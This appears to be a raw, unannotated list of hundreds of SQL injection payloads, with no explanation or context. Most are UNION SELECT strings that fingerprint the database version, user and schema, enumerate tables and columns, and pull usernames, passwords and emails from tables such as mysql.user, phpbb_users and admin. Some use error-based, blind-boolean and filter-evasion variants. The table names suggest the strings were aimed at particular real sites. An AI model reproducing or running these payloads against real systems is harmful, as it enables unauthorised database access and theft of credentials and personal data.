union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user()),9,10,11,12,13-- -80 union select 1,2,3,4,5,6,concat_ws(0x3A3a,version(),database(),user()),8,9,10,11,12,13-- -80 union select 1,2,3,4,5,concat(version(),0x3a3a,user(),0x3a3a,database()),7,8,9,10/* -80 union select 1,2,3,4,5,user(),7,8,9,10,11,12 -- -80 union select 1,2,3,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8-- 80 UNION SELECT 1,2,3,version(),5,6,7,8 LIMIT 1,1 -80 union select 1,concat(user,0x3a,password),3,4,5,6 from mysql.user/* 80 UNION SELECT 1,user(),3,4,5,6,7,8,9,10 limit 1,1/* -811' union select 1,2,3,4,5,6,7,8,concat_ws(0x3a3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22 from users limit 2,1 -- 814 and 1=0 union select 1,concat_ws(0x3a,customers_email_address,customers_password),3 from customers -814 union select 1,2,3,group_concat(table_name),5,6,7,8,9,0,1,2,3,4 from information_schema.tables -- -8153 union select 1,2,concat(version(),0x20,database(),0x20,user()),4,5,6,7,8,9,10,11,12-- -815' union select 1,2,concat_ws(0x3a,version(),database(),user()),4,33,6,7,8,9,0,11,12,13,14 -- 815 union select 1,2,version(),4,5,6,7-- 8169 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -8190 union select 1,2,3,4,convert(concat(user,0x3a,password),binary),6,7,8,9,0,1,2,3,4 from mysql.user/* 81 and 1=2 union select 1,2,3,4,5,6,7,concat(login,char(58),password) from users_cp 81 or 1=(SELECT TOP 1 cast(login as nvarchar) ':' cast(pass as nvarchar) FROM Admin)-- -81 order by 10-- 81 order by 7-- -81 UNION SELECT 0,concat_ws(0x0b,user(),database(),version()),2 -- -81 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 -81 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 -- -81 union select 1,2,3,4,5,6,7,8,9,10,11,version(),13/* -81 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,version(),database(),user())-- 81 union select 1,2,3,4,5,6,concat_ws(0x3a,name,pass,email),8,9,1 from users limit 0,1/* -81 union select 1,2,3,4,5,concat_ws(0x3a3a,username,password,level,gruppa,email),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125 from ins_users -- -81 union select 1,2,3,concat_ws(0x3a3a,EngName,PatronBarCode,pw,ptype),5,6 from PatronStaff where ptype=100 -- 81 union select 1,2,3 from mysql.admin/* 81 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8 limit 1,1/* -81 union select 1,concat_ws(0x3a3a,userid,paswid) from ,4,5,6 from admin -- -81 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -81 union select 1,version() from users/* -820 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28/* 820 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7-- 820 UnIon selECt 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15 -- -822 and 0 union select 1,2,concat(version(),0x3a,database(),0x3a,user()),4,5,6,7,8/* -8233 union select 1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.tables limit 1,1-- -8239 UNION SELECT 0,1,2,3,concat_ws(0x0b,user(),version(),database()),5,6,7,8,9,10,11,12,13,14 -- -823 and 0 union select 1,concat_ws(0x3a,user(),database( ),version()),3,4,5,6 -- -823 union select 1,concat_ws(0x2d2d2d,user,host,password,file_priv),333333 from mysql.user-- -823 union select concat(version(),0x20,database(),0x20,user()),2,3,4,5,6,7-- -824 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 8261 union select 1,2,3,4,5,6,convert(version(),binary),8,9,0,1,2,3,4,5,6 from users/* 8262-4 union select 1,2,3,4,5,6,7,USER(),9,10,11,12,13,14,15,16,17,18,19/* 826' or 1 group by concat(concat_ws(0x3a,version(),database(),user()),floor(rand(0)*2))having min(0) or 1-- -826 union select 1,concat_ws(0x0b,version(),database(),user(),@@version_compile_os),now(),group_concat(0x0b,table_name),5,6 from information_schema.tables-- 829 and 1=0 UnIon selECt 1,2,3,4,5,concat_ws(0x3a,id,login,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from vacuums_users limit 0,1-- 82 and 1=0 /*!UNION*/ SELECT 1,2,3,4,5,version(),7,8,9 -- 82 and 1=0 union select 1,2,3,concat_ws(0x3a,user,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from mysql.user-- -82 and 1=1 union select 1,2,3,version(),5,6,7,8,9/* -82 union select 1,2,3,4,5,6,7,8,version()/* -82' union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),9,10,11,12,13,14 -- -82 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20/* -82 union select 1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables limit 17,1/* 82 UNION SELECT 1,2,3,4,concat(user(),0x3a,version()),6,7,8,9,10,11,12 LIMIT 1,1/* -82 union select 1,2,3,4,concat_ws(0x3a,name,password),6,7,8,9,10,11,12,13 from admin-- -82 union select 1,2,3,concat(0x2a,user(),0x2a,database(),0x2a,version()),5 -82 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5 -- -82 union select 1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9-- -82 union select 1,2,3,version(),5,6,7,8,9-- -82 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 -- -82 union select 1,concat_ws(0x3a,id,name,password),3,4,5,6 from users-- -82 UnIon selECt 1,concat_ws(0x3a,user(),version(),database()),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5,6,7,8,9,10 -- -82 union select 1,group_concat(0x0b,username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13 from SDE_users-- 82 union select concat_ws(0x2a,database(),version(),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- -8312 union select 1,convert(concat_ws(0x3a,login,password,icq),binary),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3 from users/* -831 union select 1,2,concat_ws%25(0x3a,version(),database(),user(),@@version_compile_os),4,5,6,7,8,9,10,11,12,13,14,15,1617,18,19,20,21,22,23,24,25,26,27,28,29 from mysql.user-- -833 union select 1,column_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from information_schema.columns where table_name=(0x75736572) limit 3,1-- -836 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4 83 and 1=2 union select 1,2,3,4,5,6,concat_ws(0x3A,nome,login,senha,ativo),8,9,10,11,12,13,14,15,16,17,18 from usuario/* 83 or 1 group by concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))having min(0) or 1-- -83' union select 1,2,3,4,concat_ws(0x3a3a,id,username,password,email,firstname,lastname,accesslevel),6,7,8,9,10,11,12,13,14,15,16 from users limit 0,1 -- -83 union select 1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7 from news -- 83 union select 1,2,3,concat_ws(0x3a,user(),database(),version(),@@version_compile_os) -- -83 union select 1,2,3,concat_ws(char(58),TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),5,6,7,8,9,10,11,12 from INFORMATION_SCHEMA.COLUMNS limit 1900/* -83 union select 1,2,3,version(),5,6,7,8,9,10-- -83 union select 1,2,concat_ws(0x3a3a3a,user,password,file_priv),4,5 from mysql.user -- -83 union select 1,concat(table_name,0x3a,column_name),3 from information_schema.columns/* -83 union select 1,concat_ws(0x3a3a,version(),user(),database()),3,4,5,6 -- -83 union select 1,unhex(hex(table_name)),3 from information_schema.tables limit 41,9 -- -83 union select 1,version(),3,4,5,6,7,8,9-- -83 union select concat_ws(0x3a3a,login,pwd),2,3,4,5,6,7,8,9,10,11,12,13,14,15 from admin -- -83 union select concat_ws(0x3a,user(),version(),database())/* 842 or (select count(*) from (select 1 union select 2 union select 3)x group by concat(mid(version(),1,63),floor(rand(0)*2))) -- -842 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19.20,21,22,23-- 843 union select concat(database(),0x3a,version()),2/* -848 union select 1,2,3,concat(login,0x3a,pass),5,6,7,8 from bestsport_2.my8pref_adm_usr limit 0,1/* 84 and 1=0 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17-- 84 and 1=0 union select 1,concat_ws(0x3a,username,password),3,4 from member_login-- 84 or (select count(*)from(select 1 union select 2 union select 3)x group by concat(mid((select concat_ws(0x3a,id,lastname,password) from cc_members limit 0,1),1,64),floor(rand(0)*2))) -84 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42 -- -84 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,database(),version(),user()),10,11,12,13,14,15,16-- -84 union select 1,2,3,4,5,6,7 from tbl_diary_users-- -84' union select 1,2,3,4,5,concat_ws(0x3a3a,user_id,email,password,access_site,group_id),7,8 from users limit 1,1 -- 84 UNION SELECT 1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User()),0x71),0x71),6,7,8,9 LIMIT 1,1-- -84 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -84 UNION SELECT 1,2,3,concat_ws(0x3a,username,password),5 from users/* -84 union select 1,2,concat_ws(0x3a3a,username,password,Email),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71 from Users -- -84 union select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),1),1),3,4,5,6,7,8,9,10,11 from mysql.user limit 0,1-- 84 UNION SELECT 1,CONCAT(user(),0x0b,database(),0x0b,version()),3,4 FROM users LIMIT 1,10-- 84 UNION SELECT concat(user,0x3a,password),2,3,4,5,6,7,8 from mysql.user/* 8500000 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,6,14,18,19,20,21,22 from users limit 0,1/* 850 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12 limit 1,1/* -851586126 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,database(),version(),user()),17,18,19,20 -8517 union select 1,concat_ws(char(32,58,32),user(),database(),version())-- -8529 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 from information_schema.tables -- -853' union select 1,2,unhex(hex(version())),4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9 -- -854370 union select 1,AES_DECRYPT(AES_ENCRYPT(concat(username,0x3a,password),0x71),0x71),3,4,5,6,7,8,9,10,11 from users/* -8544 union select 1,2,3,4,version(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43/* 854 or 1=(SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='PASSWORD_T' and column_name not in ('ID'))-- 854 or 1=@@version-- 857 and ascii(lower(substring((select password from mysql.user where user='root' limit 1),1,1)))<110 857 union select 1,concat_ws(0x3a3a3a,email,password),3,4,5,6 from user limit 0,1 -- -85962 ' UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3a,version(),database(),user()),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69 -- 85-999.9 union select 1,2,concat_ws(0x3a,version(),user(),database())-- 85 and 1=0 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11-- 85' and ascii(substring(version(),1,1))=53-- 85 group by concat(version(),floor(rand(0)*2)) having min(0) -85 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()) 85 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0 -- -85 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 /* -85 union select 1,2,3,4,5,6,group_concat(username,0x3a,password),8,9,10,11,12,13,14 from users -- -85 union select 1,2,3,4,5,concat(user(),char(58),version(),char(58),database()),7/* -85 union select 1,2,3,4,concat(@i:=0x00,@o:=0x0d0a,benchmark(10,@o:=CONCAT(@o,0x0d0a,(SELECT concat(table_schema,0x2E,@i:=table_name) from information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5-- 85 union select 1,2,3,4,concat_Ws(0x3a3a,user_name,password),6,7,8,9,10,11 from user limit 1,1 -- -85 union select 1,2,3,4,concat_ws(0x3a,user(),version(),database()),6,7,8 -- -85 union select 1,2,3,4,group_concat(user(),0x3a,database(),0x3a,version()),6,7,8,9,10,11,12,13,14,15,16-- -85 union select 1,2,3,4,user(),6,7,8-- -85 union select 1,2,3,4,version(),user(),7,8,9,10,11,12,13,14,15-- -85 union select 1,2,3,user(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- -85 union select 1,2,concat(username,0x3a,password),4,5,6,7,8,9 from SiteLogins limit 0,1/* -85 union select 1,column_name,3,4,5,6,7,8 from information_schema.columns where table_name=0x7573657273 -- -85 union select 1,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),3,4,5,6,7,8,9,10-- -85 union select 1,database(),3,4,5,6,7,8,9-- -85 union select 1,version() -- 8600000000000000000' UnIon selECt 1,concat_ws(0x3a,user(),version(),database()) -- -8609 union select 1,2,3,4,5,6,7,8,9,10,11,12,group_concat(name,char(58),password),14,15,16,17,18,19,20,21 from srdb01.auth -- 861 and 1=0 UnIon selECt 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,id,username,password),18,19,20,21,22,23,24,25 From OblBol_users limit 0,1 -- -861 union select 1,2,3,unhex(hex(version())),5,6,7,8,9,10,11-- -861 union select 1,u.* from users u/* -862 union select 1,2,concat_ws(0x3a,user_id,user_password, username()),4,5,6,7,8,9,10,11,12,13,14,15,16 from phpbb_users-- -862 union select 1,2,concat_ws(0x3a,user_id,user_password,username()),4,5,6,7,8,9,10,11,12,13,14,15,16 from phpbb_users-- 86311 union select 1,2,USER(),VERSION(),5,DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* -863 union select 1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 from members/* 864 union select 1,2,unhex(hex(user())),4,5,6 /* 865 and 1=2 UNION SELECT 1,concat_ws(0x3a ,user(),database(),version()),3,4,5,6,7,8,9-- -865 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from nuke_users/* 8679879800970 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- -8679 /*!UNION*/ /*!SELECT*/ 1,concat(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17-- -867 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,concat_ws(0x3a,version(),user(),database()),52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71-- -867 UNION SELECT 1,2,3,concat_ws(0x3a ,user(),database(),version()),5,6,7,8,9,10,11,12-- -867 union select 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7 -8681 and 1=2 union select 1,2,3,4,5,6,7,8,concat_ws(char(58),version(),user(),database(),@@version_compile_os),10,11,12,13,14,15,16,17,18-- -868 and 1=2 union all select 1,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database(),@@version_compile_os),0x71),0x71),3-- -868 union select 1,2,concat(table_name,0x3a,column_name),4,5,6,7 from information_schema.columns limit 1111,1/* -86925 union select 1,user,password,4,5,6,7,8,9,10,11 from mysql.user limit 1,100/* 86-999.9 union select 1,concat_ws(user(),version(),database()),3,4,5,6,7-- -869 union select 1,email,3,4,5,6,7,8,9,10,11,12 from forum/* 86 and 0 union select 1,concat(version(),0x3a,0x3a,user(),0x3a,0x3a,database()),3,4,5,6,7,8,9,10,11,12 -- -86 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,concat(username,0x3a,password),15,16,17,18,19,20,21,22 from users/* -86' union select 1,2,3,4,5,6,7,8,concat(username,char(58),passwd),10,11 from user limit 0,1/* -86 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,user(),version(),database()),0,11,12,13,14 -- 86 union select 1,2,3,4,5,6,concat_ws(0x3a,admin_id,first_name,last_name,email,password),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from admin-- -86 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 -- 86 union select 1,2,3,4,5,6 from news -86 union select 1,2,3,4,5,6,version(),8,9,10,11,12-- -86 union select 1,2,3,4,concat_ws(0x3a3a3a,username,password),6,7,8,9,10,11,12,13,14,15 from users -- -86 union select 1,2,3,AES_DECRYPT(AES_ENCRYPT(database(),0x71),0x71),5,6,7,8/* -86 union select 1,2,3,concat_ws(char(124),email,pass),5,6,7,8,9 from minbud_user limit 2,1-- -86 UNION SELECT 1,2,3,group_concat(TABLE_NAME),5,6,7,8,9,10,11,12,13,14 FROM INFORMATION_SCHEMA.TABLES-- -86 union select 1,2,3,version(),5,6,7,8,9,0,1,2,3 -- -86 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13-- -86 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- -86 union select 1,2,table_name,4,5,6,7,8,9,0,1,2 from information_schema.tables limit 22,1-- -86 union select 1,2,unhex(hex(concat(user(),0x2,database(),0x2,version()))),4,5,6,7,8,9,10-- -86 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5-- 86UNION SELECT 1 LIMIT 1,1/* -86 union select 1,table_name,3,4,5,6 from INFORMATION_SCHEMA.TABLES-- -86 union select concat_ws(0x3a3a,id_administrateur,login,mot_passe,profil,nom,prenom,telephone,email),2,3,4 from administrateurs -- 871291 and 1=2 union select concat_ws(0x3a,version(),user(),database()),2-- 871 union select concat_ws(0x203a20,version(),database(),user(),@@version_compile_os)-- 8722 and 1=0 union select 1,2,version(),4,5 -- 872' and 1=0 union select 1,2,3,version(),5,6,7,8,9,10,11 -- -872 union select 1,2,3,4,5,6,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),8,9,10,11,12,13,14,15,16,17,18,19,20-- -873' union select 1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9/* -874 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 -- -875 union select 1,2,3,4,5,6,7,8,9,version(),1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,74/* -875 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -- 87678678 union select 1,2,3,4,5,version(),7,8,9-- -876' union select 1,2,3,4,5,6,7,8,9,10,11 /* -877 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 /* -8787 union select 1,2,3,4,5,concat_ws(0x0b,name,0x3a,pass),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from users -- -878 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,group_concat(table_name),6,7,8,9,0,1,2 from information_schema.tables -- -87910 union select 1,2,3,concat(table_schema,0x3a,table_name,0x3a,column_name),5,6,7,8 from information_schema.columns where column_name like 0x257061737325 limit 0,1/* -8792' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x3a3a,user,passwd),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77 from user -- 87-999.9 union select 1,2,concat_ws(user(),version(),database()),4,5,6,7,8,9,10,11-- -879 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,0,1,2 -- -879 union select 1,2,group_concat(0x0b,table_name),4,5,6,7,8,9,10,11,12 from information_schema.tables -- -879 union select 1,2,version(),4,5,6,7,8,9,10,11,12 87 and 1=0 union select 1,2,3,4,concat_ws(0x3b,id,login,parol,admin),6 from km_users -- 87 and 1=0 union select 1,concat_ws(0x3a,username,userpass),3,4,5,6,7,8,9,10 from Copy_of_Copy_of_poll_1.poll_user-- 87 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6-- 87 and 1=db_name()-- 87 and 1=(select top 1 table_name from information_schema.tables)-- 87 and 1=system_user-- 87 or 1 group by concat(concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),floor(rand(0)*2)) having min(0) or 1-- -87 union select 1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from information_schema.tables -- 87 union select 1,2,3,4,concat_ws(0x3a,user(),database(),version()),6,7,8,9-- -87 union select 1,2,3,4,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),6,7,8,9,10 -87 union select 1,2,3,4,unhex(hex(version())),6,7,8,9,10,11,12/* -87 union select 1,2,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),4,5,6,7,8,9,10,11,12,13-- -87 union select 1,2,unhex(hex(concat_ws(0x3a,version(),user(),database()))),4,5,6,7,8/* -87 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5/* -87 union select 1,concat(user(),0x3a,database()),3,4,version(),6,7/* -87 union select 1,concat(version(),0x20,database(),0x20,user()),3,4,5,6,7,8,9,10-- -87 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6-- -87 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,19,20,21,22,23,24 -- -87 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10-- -87 union select 1,concat_ws(char(58,58),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/* -87 union select 1,user(),database(),version(),5,6,7,8,9 from user limit 0,1 -- -87 union select 1,version(),database(),4,5,6,user(),8,9,0/* -87 union select concat_ws(0x2a3a2a2a3a2a2a3a2a,version(),user(),database()),2-- 880 aNd 1=0 UNION SELECT 1,2,3,version(),5 -- -880 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5-- -880 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10/* -881 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3C62723E,VERSION(),DATABASE(),USER()),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 -881 union select 1,2,3,4,5,concat_ws(0x3a3a3a,version(),user(),database()),7,8,9,10,11,12,13,14-- 882 union select 1,concat_ws(0x3,version(),user(),database()),3,4,5,6,7,8/* 8831 union select 1,2,concat_ws(0x3a,convert(version() using cp1251),convert(user() using cp1251),convert(database() using cp1251),convert(@@version_compile_os using cp1251)),4,5,6,7,8,9,10-- -883 UnIon selECt 1,2,aes_decrypt(aes_encrypt(group_concat(table_name),1),1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 from information_schema.tables limit 0,1-- 885 and 1=0 union select 1,2,3,4,5,6,group_concat(es_admin_name,char(58),es_pwd),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from esb2b_admin 885 and 1=0 union select group_concat(schema_name) from information_schema.schemata -- 885 union select 1,2,3,4,5,concat_ws(0x3a3a,id,email,web,password,lastlogin),7,8,9,10,11,12,13,14 from users limit 0,700 /* -885 union select 1,2,3,concat_ws(0x3a,uid,uname,pass,email),5,6 from xoops_users/* 88609756518 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12-- -886 union select 1,concat_ws(0x3b,user(),version(),database())-- -8872' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,pass,login,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from members/* 887654346 union select 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),3,4,5,6,7,8-- 8888812 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43-- 88888810 union select 1,2,3,concat_ws(0x3a3a,version(),user(),database()),5,6-- 8889097700 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),user(),database()),8-- 8896 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,42-- 889 AnD row(1,2)in(select count(*),CoNCaT((select TabLE_NAmE from information_schema.`tables` LiMIT 0,1),0x3a,floor(rand(0)*2))as a from information_schema.`tables` x GrOuP by a) -889 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14/* -889 union select 1,2,convert(version() using cp1251),4,5,6,7,8,9/* -88 UNION SELECT 0,concat_ws(0x0b,user(),version(),database()),2,3,4,5,6,7 -- -88 union select 1,2,3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,18,concat_ws(0x3a,version(),database(),user()) -- -88 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25/* -88 union select 1,2,3,4,5,6,7,concat_ws(0x3a3a,username,user_password),9,10,11,12,13 from phpbb_users limit 1,1 -- -88 union select 1,2,3,4,concat(database(),0x3a,version(),0x3 -88 Union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10 -88 union select 1,password,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from users/* -88 union select 1,user(),3,4,database(),version(),7,TABLE_NAME from information_schema.tables/* -88 union select 1,user_password,3,4,5,6,username,8 FROM phpbb_users LIMIT 1,1 -- -88' union select 1,version(),3,4,5 -- 8908097654 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),13,14,15,16,17,18,19-- 89097380980987 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8-- 89097654 UNION SELECT 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,user(),0x3a),0x71),0x71),4,5-- -89-1 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11-- (892) and (1)=(2) union select 1,2,3,4,5,6,7,8,USER(),DATABASE(),VERSION(),12,13,14,15,16 -- 893499 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,login,password),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 from users where id=1/* 8935 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user()),7,8,9,10,11,12,13,14,15,16,17,18,19 